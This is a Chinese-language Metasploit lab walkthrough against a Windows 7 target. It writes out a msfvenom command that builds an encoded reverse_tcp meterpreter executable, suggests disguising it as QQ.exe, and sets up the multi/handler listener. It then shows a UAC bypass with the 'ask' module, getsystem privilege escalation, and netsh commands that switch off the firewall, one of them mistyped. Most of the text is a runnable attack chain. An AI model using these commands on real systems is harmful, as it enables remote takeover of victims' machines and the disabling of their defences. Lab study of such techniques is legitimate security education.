一.实验背景
随着windows系统的不断更新完善,windows对用户系统的安全力度也在加强。第一天和第二天的漏洞也很容易通过添加补丁修复,这对我们的渗透,也带来了不少的麻烦。所以今天我将带大家,利用目前流行的 metasploit 框架,绕过一些 UAC 及防火墙的限制,从而达到成功利用的目的!
二.实验环境
攻击机kali :192.168.126.129
靶机 win7:192.168.126.134
三.操作步骤
1.使用.exe作为web shell(关闭防火墙)
(1)生成一个payload
命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.126.129 lport=4444 -f exe -o /root/virus.exe -e x86/shikata_ga_nai -i 8
(2)将程序上传到win7
可以适当伪装该程序(例如QQ.exe)
(3)在kali中配置一个会话反弹程序
命令:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.126.129
set LPORT 4444
exploit
(4)当win7点击该软件后,就会执行meterpreter模块
(5)执行meterpreter模块的命令
例如:
2.使用.exe作为web shell(开启防火墙)
设置步骤如上同
(1)利用 getuid 和 getsystem 命令来提权
可以发现命令遭到了 UAC 的用户访问控制的拦截
(2)使用msfconsole其他模块绕过
命令:
use exploit/windows/local/ask
options
set session 1
exploit
此时win7会弹出一个窗口,点击确定即可
重新输入getsystem命令,此时不会报错
成功绕过防火墙
(3)重新进入会话(ASK模块)
相关操作:
exploit //立刻发起进攻
exploit -l //发起进攻存入后台
background //将session放入后台
sessions //查看当前session
sessions -i xx //调用后台
现在我们通过shell来关闭防火墙
命令:
shell
netsh adcfirewall set allprofiles state off
shell(cmd界面)其他相关操作:
netsh advfirewall show allprofiles //查看当前防火墙状态
netsh advfirewall set allprofiles state off //关闭防火墙
netsh advfirewall set allprofiles state on //开启防火墙
(出现乱码的原因:linux与windows编码格式不同。可以使用命令chcp 65001修复)
在win7中查看防火墙状态
可以看到防火墙已经关上,并已获得最高权限
网络信息安全-ploto